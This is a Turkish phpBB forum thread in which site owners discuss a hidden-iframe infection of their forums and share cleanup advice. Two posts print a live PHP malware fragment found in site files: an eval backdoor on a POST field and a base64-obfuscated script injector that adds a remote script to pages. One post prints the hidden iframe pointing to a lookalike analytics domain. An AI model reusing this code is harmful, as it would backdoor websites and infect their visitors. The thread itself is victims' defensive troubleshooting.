Siteme İframe Virüsü Bulaştı!

[Pierce_MVP]

Arkadaşlar sitemde iframe olarak saklı bir link virüsü var.Bunun çözümlerini okudum.index.php ve index.html dosyalarının altında bulunuyor saklı olarak bende düzelttim virüs taramsından geçirerek tekrar ftpden gönderdim.Çoğu yer düzeldi ancak sayfa kaynak kodunu tekrar göster deyince üstte yine google analystic linki diye kandırarak bir link var birtek onu bulamadım.Sizce hangi dosyaya bakmamış olabilirim?

[Özcan Akbulut]

overall_header.html ve footere bak.

[Pierce_MVP]

Hayır o dosyalarda yok.Dediğim gibi index.php ve index.html dosyalarında bulunuyor.İçinizden biri usanmadan tüm index dosyalarının nerde olduğunu yazabilirmi?

[piyanistsb2]

phpbb3 klasöründe index diye arama yap hepsi çıkar

[basoglanh]

Bilgisayarınıza format atmayı denerseniz daha iyi olur. Pc'den bulaşan iframeler çok çok fazla.

[Pierce_MVP]

Bilgisayarınıza format atmayı denerseniz daha iyi olur. Pc'den bulaşan iframeler çok çok fazla.

Evet ilk işim pcye format atmak olacak.Sonra sitenin ftp dosyalarını indirip index dosyalarındaki dosyaları gözden geçirerek iframe linklerini silerim virüs taramasından geçirdikten sonra ftpye atayım.Sizce böyle bir yol nasıl olur?

[akansu]

Evet ilk işim pcye format atmak olacak.Sonra sitenin ftp dosyalarını indirip index dosyalarındaki dosyaları gözden geçirerek iframe linklerini silerim virüs taramasından geçirdikten sonra ftpye atayım.Sizce böyle bir yol nasıl olur?

Evet olabilir.

Bir iki tavsiye daha vereyim geçen bir site de benim de başıma geldi. Dreamvawer varsa onunla klasörse ara diyerek kullandığın temanın tüm klasörlerinde <iframe> diye arattırabilirisn.

Crack lı FTP programı kullanma.
Hostundan virüs taraması için talepte bulun.
Ana dizindeki .htaccess dosyanı gözden geçir.

[Pierce_MVP]

Evet ilk işim pcye format atmak olacak.Sonra sitenin ftp dosyalarını indirip index dosyalarındaki dosyaları gözden geçirerek iframe linklerini silerim virüs taramasından geçirdikten sonra ftpye atayım.Sizce böyle bir yol nasıl olur?

Evet olabilir.

Bir iki tavsiye daha vereyim geçen bir site de benim de başıma geldi. Dreamvawer varsa onunla klasörse ara diyerek kullandığın temanın tüm klasörlerinde <iframe> diye arattırabilirisn.

Crack lı FTP programı kullanma.
Hostundan virüs taraması için talepte bulun.
Ana dizindeki .htaccess dosyanı gözden geçir.

Evet bu dediklerinide mantıklı denerim sağolasın.Umarım düzelir google siteyi zararlı olarak bildiriyor malesef.

[Ademx33]

Crack lı FTP programı kullanma.

Niye virüsmü bulaştırır Cracklı FTP ?
Ee o zaman nasıl atacağız cracksız normal FTP ile hosta ?

[akansu]

Niye virüsmü bulaştırır Cracklı FTP ?

Evet cracklı FTP kullanmak bu gibi sorunlara sebebiyet verebilir. Bu sıralar bu iframe virüsü çok yaygın.Sebebini tam olarak bilmiyorum. Nereden bulaşıyor emin değilim ama Cracklı FTP olası sebeplerden birisi.

Ee o zaman nasıl atacağız cracksız normal FTP ile hosta ?

Ücretsiz FTP programları var. Mesela Filezilla. Ama bu iframe kodu bulaşmış biri daha vardı bildiğim FileZilla kullanıyordu .Demekki bu aralar dolaşan bu ifare salgınının sebebi cracklı FTP olmayabilir.Ama bazıları için olabilirde.

[Pierce_MVP]

Evet bu aralar baya yaygın şu iframe virüsü.Ve bir kurbanıda ben oldum o yüzden virüsten kaynayan pcniz varsa kesinlikle ftpyle bağlanmayın!Şimdiden söyleyim yoksa benim hala başım ağrıdığı gibi sizinde ağrır.Bu virüs konusu çok önemli.

Ve birşey daha soracam.Sitemin anasayfasında bir tane daha iframe kodu var üstte

Kod: Tümünü seç

<iframe src="http://google-ana1yticz.com/?click=114A903" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

ve bu iframe linkini bulamadım bir türlü.Sadece anasayfada duruyor ama.Diğer konula vb. yerlerde yok.

[adyghe]

benzeri bi sorun benimde başımı ağrıttı 2 gündür, biraz araştırdım karşılaşan çok ama henüz kesin bi çözümü yok. bikaç öneride bulunan olmuş ve deneyenler sorunun şuan için çözüldüğünden bahsediyor onlardan biri de benim

farklı bi pc'den kracksiz ftp programı ile hostuma girdim ve son bikaç günde hosta attığım dosyaları indirip teker teker düzenleyip geri attım.
kendi pc'mdeki dosyalara baktığımda index.html, overall_footer.html ve de bikaç html'de daha olduğunu gördüm fakat isimleri tam aklımda değil şuan. en son 3-4 ay önce içinde işlem yaptığım dosyalara dahi girmiş yani bunda olur şunda olmaz demeyin erinmeyip bütün dosyalarınıza bakın. index.html'lerde kesin oluyor.

dreamweaver, expression artık hangi programı kullanıyorsanız kaldırıp yeniden kurun.

[aliozdil]

Bazı sayfalarda aşağıdaki kodu buldum bu virüs müdür?

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihMVDNJKXt2YXIgWEtLQjU9J3YhNjEhNzIhMjAhNjEhM2QhMjJTYyE3MmlwdEUhNmVnITY5bmUhMjIhMmNiITNkITIyVmVycyE2OW9uITI4ITI5KyEyMiEyYyE2YSEzZCEyMiEyMiEyY3UhM2RuYXZpZ2F0byE3MiEyZXVzZXJBZyE2NW50ITNiaWYoKHUhMmVpITZlZGV4T2YhMjghMjJDaHJvbWUhMjIpITNjMCkhMjYhMjYoITc1ITJlITY5bmQhNjV4T2YoITIyITU3aW4hMjIpITNlMCkhMjYhMjYodSEyZWkhNmUhNjRleE9mKCEyMk5UITIwNiEyMikhM2MwITI5ITI2ITI2ITI4ITY0b2N1ITZkZSE2ZXQhMmVjb28hNmIhNjkhNjUhMmVpbiE2NGV4T2YhMjghMjJtaSE2NWshM2QxITIyKSEzYzAhMjkhMjYhMjYodCE3OXBlbyE2Nih6ITcydiE3YXRzKSEyMSEzZHR5cGVvZighMjIhNDEhMjIpKSEyOSE3YiE3YXJ2enRzITNkITIyQSEyMiEzYmV2YSE2YyghMjJpITY2KHdpbmRvITc3ITJlITIyITJiYSshMjIpITZhITNkaiEyYiEyMiEyYmErITIyTWFqb3IhMjIrYithKyEyMiE0ZGlub3IhMjIrYithKyEyMkJ1aWwhNjQhMjIrITYyKyEyMiE2YSEzYiEyMikhM2Jkb2N1bWVuITc0ITJld3JpdGUoITIyITNjc2NyaSE3MHQhMjBzcmMhM2QhMmYhMmZtITIyITJiITIyYSE3MnR1ITdhITJlY24hMmYhNzZpZCEyZiEzZmlkITNkITIyK2ohMmIhMjIhM2UhM2MhNWMhMmZzYyE3MmlwdCEzZSEyMikhM2IhN2QnO3ZhciBnenRVSz11bmVzY2FwZShYS0tCNS5yZXBsYWNlKExUM0ksJyUnKSk7ZXZhbChnenRVSyl9KSgvXCEvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler

[basoglanh]

Bazı sayfalarda aşağıdaki kodu buldum bu virüs müdür?

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihMVDNJKXt2YXIgWEtLQjU9J3YhNjEhNzIhMjAhNjEhM2QhMjJTYyE3MmlwdEUhNmVnITY5bmUhMjIhMmNiITNkITIyVmVycyE2OW9uITI4ITI5KyEyMiEyYyE2YSEzZCEyMiEyMiEyY3UhM2RuYXZpZ2F0byE3MiEyZXVzZXJBZyE2NW50ITNiaWYoKHUhMmVpITZlZGV4T2YhMjghMjJDaHJvbWUhMjIpITNjMCkhMjYhMjYoITc1ITJlITY5bmQhNjV4T2YoITIyITU3aW4hMjIpITNlMCkhMjYhMjYodSEyZWkhNmUhNjRleE9mKCEyMk5UITIwNiEyMikhM2MwITI5ITI2ITI2ITI4ITY0b2N1ITZkZSE2ZXQhMmVjb28hNmIhNjkhNjUhMmVpbiE2NGV4T2YhMjghMjJtaSE2NWshM2QxITIyKSEzYzAhMjkhMjYhMjYodCE3OXBlbyE2Nih6ITcydiE3YXRzKSEyMSEzZHR5cGVvZighMjIhNDEhMjIpKSEyOSE3YiE3YXJ2enRzITNkITIyQSEyMiEzYmV2YSE2YyghMjJpITY2KHdpbmRvITc3ITJlITIyITJiYSshMjIpITZhITNkaiEyYiEyMiEyYmErITIyTWFqb3IhMjIrYithKyEyMiE0ZGlub3IhMjIrYithKyEyMkJ1aWwhNjQhMjIrITYyKyEyMiE2YSEzYiEyMikhM2Jkb2N1bWVuITc0ITJld3JpdGUoITIyITNjc2NyaSE3MHQhMjBzcmMhM2QhMmYhMmZtITIyITJiITIyYSE3MnR1ITdhITJlY24hMmYhNzZpZCEyZiEzZmlkITNkITIyK2ohMmIhMjIhM2UhM2MhNWMhMmZzYyE3MmlwdCEzZSEyMikhM2IhN2QnO3ZhciBnenRVSz11bmVzY2FwZShYS0tCNS5yZXBsYWNlKExUM0ksJyUnKSk7ZXZhbChnenRVSyl9KSgvXCEvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler

Normal phpBB dosyalarında bu gibi kodlar olmadığını sanıyorum. Kurduğunuz eklentilerden kaynaklanan bir kod dilimi olabilir.Birde verdiğiniz kodlar tam olarak hangi dosyalardan çıktı yazarsanız daha iyi olur.

[bplr]

Bu eklenti değil, iframe gumblar virüsü.
Çözümü, virus gelmeden önceki dosya yedeklerine dönmek, yada virüsü temizlemek, temizlenemiyorsa, tüm phpBB3 dosyalarını silip temiz bir forum zip dosyası indirip sunucuya yüklemek.
Muhtemelen, filezilla gibi şifreleri pc de açık saklayan bir ftp programı yoluyla hosting şifrenizi virus programı öğrendi, bu sebeple kullandığınız pc yi de virüslerden temizleyin, en garantisi formatlayın.
Ayrıca da, tüm şifrelerinizi de değiştirin.